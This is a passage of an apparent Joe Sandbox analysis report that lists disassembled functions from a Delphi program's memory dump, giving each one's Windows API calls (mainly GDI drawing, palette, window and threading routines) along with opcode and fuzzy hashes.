API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
String ID:
API String ID: 185507032-0
Opcode ID: 5109d55bfeb65ddda46193cc9d10d95c5bd6552ffeb91bc2503e9a81d1e2a526
Instruction ID: 2449875ee5d9fd76b47d9a8b09455b5ccfce75266c55ed44b91f15e0ce31c4a7
Opcode Fuzzy Hash: 5109d55bfeb65ddda46193cc9d10d95c5bd6552ffeb91bc2503e9a81d1e2a526
Instruction Fuzzy Hash: 9C1136B2208204AAE200FBA4CCC4F9B7BACAB45704F408619B754D61D0EBB5FD448B76

Uniqueness

Uniqueness Score: -1.00%

Function 0414CA6C Relevance: 9.2, APIs: 6, Instructions: 150COMMON

Download Yara Rule

APIs

FillRect.USER32(?,?), ref: 0414CAE5
GetClientRect.USER32(00000000,?), ref: 0414CB10
FillRect.USER32(?,?,00000000), ref: 0414CB2F

Part of subcall function 0414C9E0: CallWindowProcA.USER32(?,?,?,?,?), ref: 0414CA1A

BeginPaint.USER32(?,?), ref: 0414CBA7
GetWindowRect.USER32(?,?), ref: 0414CBD4
EndPaint.USER32(?,?,0414CC48), ref: 0414CC34

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: Rect$FillPaintWindow$BeginCallClientProc
String ID:
API String ID: 901200654-0
Opcode ID: 9cfc5a8a117a18e4b2d3244705351a5845b3aabe01a0a18e1c159ee009384f3e
Instruction ID: 1a9c4234c45338dd353840f77f7032ba11a26dfc49211e62f2e147f0a3ba6984
Opcode Fuzzy Hash: 9cfc5a8a117a18e4b2d3244705351a5845b3aabe01a0a18e1c159ee009384f3e
Instruction Fuzzy Hash: 7B51D374A01208EFDB04DFA8C588E9DB7F9AF49314F2681A5E408EB261E734BA45DF44

Uniqueness

Uniqueness Score: -1.00%

Function 0410F8F8 Relevance: 9.1, APIs: 6, Instructions: 139COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0410F991
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0410F9AD
SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 0410F9E6
SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0410FA63
SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 0410FA7C
VariantCopy.OLEAUT32(?,00000000), ref: 0410FAB1

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: ArraySafe$BoundIndex$CopyCreateVariant
String ID:
API String ID: 351091851-0
Opcode ID: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
Instruction ID: cb86d303a1fdfcfc2cc829e884ca61407b41d2dc66b5382087d1c9c716953709
Opcode Fuzzy Hash: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
Instruction Fuzzy Hash: FB51F8B5A0062D9BDB32EB58C8D1BD9B3BCAF48214F0085D5E548E7281D7B0AF858F61

Uniqueness

Uniqueness Score: -1.00%

Function 0411D6E4 Relevance: 9.1, APIs: 6, Instructions: 109threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0411D6EF
GetCurrentThreadId.KERNEL32 ref: 0411D6FE

Part of subcall function 0411D6BC: ResetEvent.KERNEL32(000002D8,0411D739), ref: 0411D6C2

EnterCriticalSection.KERNEL32(0419A2EC), ref: 0411D743
InterlockedExchange.KERNEL32(0416AAF0,?), ref: 0411D75F
LeaveCriticalSection.KERNEL32(0419A2EC,00000000,0411D88A,?,00000000,0411D8A9,?,0419A2EC), ref: 0411D7B8
EnterCriticalSection.KERNEL32(0419A2EC,0411D834,0411D88A,?,00000000,0411D8A9,?,0419A2EC), ref: 0411D827

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: CriticalSection$CurrentEnterThread$EventExchangeInterlockedLeaveReset
String ID:
API String ID: 2189153385-0
Opcode ID: 2d9bdea4fcf65333915357fbafc4ee64bb470d0b5788d1b0c034644d9fce2211
Instruction ID: 8e4fa40dd9ffb610ddbc7a8d22c8e0056827ee227e24b70a4758223246f7da03
Opcode Fuzzy Hash: 2d9bdea4fcf65333915357fbafc4ee64bb470d0b5788d1b0c034644d9fce2211
Instruction Fuzzy Hash: 2E31E230B04644AFE715EFA8E8D1A29B7F8EB09718F51C4B0E404D26A0D7B57810CB61

Uniqueness

Uniqueness Score: -1.00%

Function 04123F4C Relevance: 9.1, APIs: 6, Instructions: 84COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(0000000B), ref: 04123F9A
GetSystemMetrics.USER32(0000000C), ref: 04123FA6
GetDC.USER32(00000000), ref: 04123FC2
GetDeviceCaps.GDI32(00000000,0000000E), ref: 04123FE9
GetDeviceCaps.GDI32(00000000,0000000C), ref: 04123FF6
ReleaseDC.USER32(00000000,00000000), ref: 0412402F

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: CapsDeviceMetricsSystem$Release
String ID:
API String ID: 447804332-0
Opcode ID: 00e22db8de8ee731cdc78eee3c8e2e0551f2c3c8a80407071e57e384c9fc570b
Instruction ID: d26ce2e45d4b6a4ccb9c914347a54a8dee40dd8cc7f6f9f2ac8de28fd2a3e63c
Opcode Fuzzy Hash: 00e22db8de8ee731cdc78eee3c8e2e0551f2c3c8a80407071e57e384c9fc570b
Instruction Fuzzy Hash: 39316B70A00258EFEB04DFA4C980AAEBBB5FB49310F00C565E918EB384D771B951CF65

Uniqueness

Uniqueness Score: -1.00%

Function 041243AC Relevance: 9.1, APIs: 6, Instructions: 65windowCOMMON

Download Yara Rule

APIs

Part of subcall function 04124258: GetObjectA.GDI32(?,00000054), ref: 0412426C

CreateCompatibleDC.GDI32(00000000), ref: 041243CE
SelectPalette.GDI32(?,?,00000000), ref: 041243EF
RealizePalette.GDI32(?), ref: 041243FB
GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 04124412
SelectPalette.GDI32(?,00000000,00000000), ref: 0412443A
DeleteDC.GDI32(?), ref: 04124443

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: Palette$Select$BitsCompatibleCreateDeleteObjectRealize
String ID:
API String ID: 1221726059-0
Opcode ID: 389bee0d898868317ede825c718af9a9ff15b9c77222746ee1c7c977385fafe9
Instruction ID: b9803c6e655273def8c15c4d9338e3c429212f613c863a2a8d33b9ebb0ac9ba1
Opcode Fuzzy Hash: 389bee0d898868317ede825c718af9a9ff15b9c77222746ee1c7c977385fafe9
Instruction Fuzzy Hash: C5114C75A046487BEB14DBA9DC80F9EB7FCEB48714F51C4A4B918E7280D7B4B9208B64

Uniqueness

Uniqueness Score: -1.00%

Function 04123BF8 Relevance: 9.1, APIs: 6, Instructions: 56windowCOMMON

Download Yara Rule

APIs

CreateCompatibleDC.GDI32(00000000), ref: 04123C11
SelectObject.GDI32(00000000,00000000), ref: 04123C1A
GetDIBColorTable.GDI32(00000000,00000000,00000100,?,00000000,00000000,00000000,00000000,?,?,04126197,?,?,?,?,04124D0F), ref: 04123C2E
SelectObject.GDI32(00000000,00000000), ref: 04123C3A
DeleteDC.GDI32(00000000), ref: 04123C40
CreatePalette.GDI32 ref: 04123C87

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: CreateObjectSelect$ColorCompatibleDeletePaletteTable
String ID:
API String ID: 2515223848-0
Opcode ID: 375d48eb9e31519ac8834c5a97fa253e779463fef4c636cabd9599be4da00ed0
Instruction ID: c772139734384974121bf5ec08272359be57445e357711acdaa7ff63e9be5390
Opcode Fuzzy Hash: 375d48eb9e31519ac8834c5a97fa253e779463fef4c636cabd9599be4da00ed0
Instruction Fuzzy Hash: C801807120432466E614B7398EC2B6B72F89F80718F04C82AB999D72C1E7B9E8758356

Uniqueness

Uniqueness Score: -1.00%

Function 041232E0 Relevance: 9.0, APIs: 6, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 04122AA8: CreateBrushIndirect.GDI32(?), ref: 04122B53

UnrealizeObject.GDI32(00000000), ref: 041232EC
SelectObject.GDI32(?,00000000), ref: 041232FE
SetBkColor.GDI32(?,00000000), ref: 04123321
SetBkMode.GDI32(?,00000002), ref: 0412332C
SetBkColor.GDI32(?,00000000), ref: 04123347
SetBkMode.GDI32(?,00000001), ref: 04123352

Part of subcall function 04121CEC: GetSysColor.USER32(?), ref: 04121CF6

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
String ID:
API String ID: 3527656728-0
Opcode ID: b936ff3cfe8b0aad2d347385d28b58bdd603c5ecf80da84ec6aa700f880e543c
Instruction ID: ce8c6f338f6ce5376ca173d257d3b33794d001e71384ea46f321944da2d9dc89
Opcode Fuzzy Hash: b936ff3cfe8b0aad2d347385d28b58bdd603c5ecf80da84ec6aa700f880e543c
Instruction Fuzzy Hash: 38F034B5600114AFEF14FFB8DAC5E1F67ACAF4420A7448490B948DF696CBA5F8308731

Uniqueness

Uniqueness Score: -1.00%

Function 041036D0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 041036F2
RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,04103741,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 04103725
RegCloseKey.ADVAPI32(?,04103748,00000000,?,00000004,00000000,04103741,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0410373B

Strings

SOFTWARE\Borland\Delphi\RTL, xrefs: 041036E8
FPUMaskValue, xrefs: 0410371C

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
API String ID: 3677997916-4173385793
Opcode ID: d23ecf5eb43ad90c040b6ddfab398b6a4a1457d1e521bbe2395e117c69917866
Instruction ID: f3378d127ccdee9c8c80a6f6781d07f97020a4bb206c01982e62ba6529850294
Opcode Fuzzy Hash: d23ecf5eb43ad90c040b6ddfab398b6a4a1457d1e521bbe2395e117c69917866
Instruction Fuzzy Hash: 2A01B5B594034CBAEB11EB91CD81BB973ECDB09B00F608061FA10E65C0E7B9B950DB55

Uniqueness

Uniqueness Score: -1.00%

Function 0414BB38 Relevance: 7.7, APIs: 5, Instructions: 181COMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00000000,00000060,00000000), ref: 0414BC0B
MulDiv.KERNEL32(?,00000000,00000000), ref: 0414BC9A
MulDiv.KERNEL32(?,00000000,00000000), ref: 0414BCC9
MulDiv.KERNEL32(?,00000000,00000000), ref: 0414BCF8
MulDiv.KERNEL32(?,00000000,00000000), ref: 0414BD1B

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da3480db584f96303ac14471d9b0fc844e5f5e303fd7b4ef188c5776db9bbca5
Instruction ID: 3a1f8c6351ce504566de5eb5628c12a4f5ea70085356770065052b6efee1debe
Opcode Fuzzy Hash: da3480db584f96303ac14471d9b0fc844e5f5e303fd7b4ef188c5776db9bbca5
Instruction Fuzzy Hash: 4981B374B04248EFDB44DB99D588EA9B7F9AF88304F2541E5E408DB365CB74BE40DB50

Uniqueness

Uniqueness Score: -1.00%

Function 0414D6DC Relevance: 7.7, APIs: 5, Instructions: 174windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(00000000), ref: 0414D800
SetMenu.USER32(00000000,00000000), ref: 0414D81D
SetMenu.USER32(00000000,00000000), ref: 0414D852
SetMenu.USER32(00000000,00000000), ref: 0414D86E

Part of subcall function 0410669C: LoadStringA.USER32(00000000,0000FFF3,?,00001000), ref: 041066CE

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000037), ref: 0414D8B5

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: Menu$LoadStringWindow
String ID:
API String ID: 1738039741-0
Opcode ID: fcf7f0a5cf2121a780d3dbfcdc661f9bc51627605bf8c310f0c81263a47274c4
Instruction ID: 8dffc49ecbd708a800a7409ee571a0106e5b999d00c9fbc4b860d4013b254ad4
Opcode Fuzzy Hash: fcf7f0a5cf2121a780d3dbfcdc661f9bc51627605bf8c310f0c81263a47274c4
Instruction Fuzzy Hash: 7C51A030A443455BEF25AF78ECC87AA37A5AF80318F0544F5EC149B2D6DB78F8858760

Uniqueness

Uniqueness Score: -1.00%

Function 0412FF30 Relevance: 7.7, APIs: 5, Instructions: 168COMMON

Download Yara Rule

APIs

DrawEdge.USER32(00000000,?,00000006,00000002), ref: 0412FFFF
OffsetRect.USER32(?,00000001,00000001), ref: 04130050
DrawTextA.USER32(00000000,00000000,?,?,?), ref: 04130089
OffsetRect.USER32(?,000000FF,000000FF), ref: 04130096
DrawTextA.USER32(00000000,00000000,?,?,?), ref: 04130101

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: Draw$OffsetRectText$Edge
String ID:
API String ID: 3610532707-0
Opcode ID: c6a691009d537d940999f167ece6aac9128bddada570c0ffaedc13f9bd11ea10
Instruction ID: 3ead1b888a7135a64d4b734b5b1612098076118a8139f90e2e19d2c7670f2580
Opcode Fuzzy Hash: c6a691009d537d940999f167ece6aac9128bddada570c0ffaedc13f9bd11ea10
Instruction Fuzzy Hash: 2B517F71A00218AFEB20EFA8CAC0B9EBBF5AF09324F158191F914E7294C774FD519B50

Uniqueness

Uniqueness Score: -1.00%

Function 04137B40 Relevance: 7.6, APIs: 5, Instructions: 139threadCOMMON

Download Yara Rule

APIs

Part of subcall function 04137F88: WindowFromPoint.USER32(-000000F7,?,00000000,04137B5A,?,-00000010,?), ref: 04137F8E
Part of subcall function 04137F88: GetParent.USER32(00000000), ref: 04137FA5

GetWindow.USER32(00000000,00000004), ref: 04137B62
GetCurrentThreadId.KERNEL32 ref: 04137C36
EnumThreadWindows.USER32(00000000,04137AD4,?), ref: 04137C3C
GetWindowRect.USER32(00000000,?), ref: 04137C53
IntersectRect.USER32(?,?,?), ref: 04137CC1

Part of subcall function 04136FC8: GetWindowThreadProcessId.USER32(?), ref: 04136FD5
Part of subcall function 04136FC8: GetCurrentProcessId.KERNEL32(?,00000000,?,04133C39,?,04132CF5), ref: 04136FDE
Part of subcall function 04136FC8: GlobalFindAtomA.KERNEL32(00000000), ref: 04136FF3
Part of subcall function 04136FC8: GetPropA.USER32(?,00000000), ref: 0413700A

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: Window$Thread$CurrentProcessRect$AtomEnumFindFromGlobalIntersectParentPointPropWindows
String ID:
API String ID: 2202917067-0
Opcode ID: 3d1e656028c3765a5a87a6ac848f441fe345fc5eddf9c925fd5b0f10458f2cf1
Instruction ID: d868e5ebdd125cf1a14242b24fd491ad4f4f2052841c9a8f435b1fdf18e6096d
Opcode Fuzzy Hash: 3d1e656028c3765a5a87a6ac848f441fe345fc5eddf9c925fd5b0f10458f2cf1
Instruction Fuzzy Hash: E5514C71A0020AAFDB10DF69C4C4AAEB7F4AF08655F1485A1F824EB380D734FD46CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0413F8F4 Relevance: 7.6, APIs: 5, Instructions: 126COMMON

Download Yara Rule

APIs

BeginPaint.USER32(00000000,?), ref: 0413F91F
SaveDC.GDI32(00000000), ref: 0413F958
ExcludeClipRect.GDI32(00000000,?,?,?,?,00000000,0413FA16,?,00000000), ref: 0413F9DA
RestoreDC.GDI32(00000000,?), ref: 0413FA10
EndPaint.USER32(00000000,?,0413FA5A), ref: 0413FA4D

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: Paint$BeginClipExcludeRectRestoreSave
String ID:
API String ID: 3808407030-0
Opcode ID: 4938bc79e9e3460a61776b4a44ecdadc36a18f983a62f4f8c88057c8c7e97314
Instruction ID: bbee12150ce5d8d5c81742497291d329ffbb85734c24de080df67c4668ab0e30
Opcode Fuzzy Hash: 4938bc79e9e3460a61776b4a44ecdadc36a18f983a62f4f8c88057c8c7e97314
Instruction Fuzzy Hash: 7C414E70A04248AFDB14DF98C899FAEBBF5FF48309F1544E8E548972A1D774AD46CB10

Uniqueness

Uniqueness Score: -1.00%

Function 0412FD70 Relevance: 7.6, APIs: 5, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8fc238d90b0112716c3fd1607c3e59ffdbea03a581490091b9b150f23e255a85
Instruction ID: f7223b2e996ff313caabd09f17e1d82de8ec3465be77977bd8c5348a4c0fe1b2
Opcode Fuzzy Hash: 8fc238d90b0112716c3fd1607c3e59ffdbea03a581490091b9b150f23e255a85
Instruction Fuzzy Hash: FD11E7317003789AEBA1BF79CBC4B6B32A98F01A48F415055FD00DB282DB64F827A350

Uniqueness

Uniqueness Score: -1.00%

Function 0412614C Relevance: 7.6, APIs: 5, Instructions: 66windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 041261A2
GetDeviceCaps.GDI32(00000000,0000000C), ref: 041261B7
GetDeviceCaps.GDI32(00000000,0000000E), ref: 041261C1
CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,04124D0F,00000000,04124D9B), ref: 041261E5
ReleaseDC.USER32(00000000,00000000), ref: 041261F0

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: CapsDevice$CreateHalftonePaletteRelease
String ID:
API String ID: 2404249990-0
Opcode ID: 7c6e7a767be6ce78f2737d223bdc8c68bb645a5318e23a15340825ae83bd1da5
Instruction ID: 5ed9967c25cf6d89a67011aa31bd10357539bfb625205a95b49cedb56c2e0777
Opcode Fuzzy Hash: 7c6e7a767be6ce78f2737d223bdc8c68bb645a5318e23a15340825ae83bd1da5
Instruction Fuzzy Hash: 1C115E316013B9AFEB20AF248AD07EE3B91AF91355F044165FC54EA5C1D7F5B8A483A1

Uniqueness

Uniqueness Score: -1.00%

Function 04150E38 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

GetWindowLongA.USER32(00000000,000000EC), ref: 04150E6C
SetWindowLongA.USER32(00000000,000000EC,00000000), ref: 04150E9E
SetLayeredWindowAttributes.USER32(00000000,?,?,00000000,00000000,000000EC,?,?,0414E59C), ref: 04150ED7
SetWindowLongA.USER32(00000000,000000EC,00000000), ref: 04150EF0
RedrawWindow.USER32(00000000,00000000,00000000,00000485,00000000,000000EC,00000000,00000000,000000EC,?,?,0414E59C), ref: 04150F06

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: Window$Long$AttributesLayeredRedraw
String ID:
API String ID: 1758778077-0
Opcode ID: ba9e005b8a0f23e861c937e85795a726bf8af5b744b239761797b8289c533d1b
Instruction ID: 6353416df6ef07e796aa129fde0bc226cff58389b89f8eeee865a19515916045
Opcode Fuzzy Hash: ba9e005b8a0f23e861c937e85795a726bf8af5b744b239761797b8289c533d1b
Instruction Fuzzy Hash: A211CA716082A067EB11BAB84CD8BD52B8C4B4931CF1845F1BD65EA1D2C768F988CB60

Uniqueness

Uniqueness Score: -1.00%

Function 04123B60 Relevance: 7.6, APIs: 5, Instructions: 55windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 04123B78
GetDeviceCaps.GDI32(?,00000068), ref: 04123B94
GetPaletteEntries.GDI32(08080EC2,00000000,00000008,?), ref: 04123BAC
GetPaletteEntries.GDI32(08080EC2,00000008,00000008,?), ref: 04123BC4
ReleaseDC.USER32(00000000,?), ref: 04123BE0

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: EntriesPalette$CapsDeviceRelease
String ID:
API String ID: 3128150645-0
Opcode ID: 8764b038fee1b431ebbaf266bd25a75310700eb27f2d00e3dc514fe81ee75e2f
Instruction ID: 156fd12479e2c09494b29dda14923dc73a4adf94efc4a17da2cfe95884430098
Opcode Fuzzy Hash: 8764b038fee1b431ebbaf266bd25a75310700eb27f2d00e3dc514fe81ee75e2f
Instruction Fuzzy Hash: 8B11E1316483486FFB00CEB88C82F6977A8E704704F40C096F564DA1C0DBBBB954CB24

Uniqueness

Uniqueness Score: -1.00%

Function 0410BB50 Relevance: 7.6, APIs: 5, Instructions: 50threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(?,00000000,0410BBE7,?,?,00000000), ref: 0410BB68

Part of subcall function 0410B8C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0410B8E2

GetThreadLocale.KERNEL32(00000000,00000004,00000000,0410BBE7,?,?,00000000), ref: 0410BB98
EnumCalendarInfoA.KERNEL32(Function_0000BA9C,00000000,00000000,00000004), ref: 0410BBA3
GetThreadLocale.KERNEL32(00000000,00000003,00000000,0410BBE7,?,?,00000000), ref: 0410BBC1
EnumCalendarInfoA.KERNEL32(Function_0000BAD8,00000000,00000000,00000003), ref: 0410BBCC

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
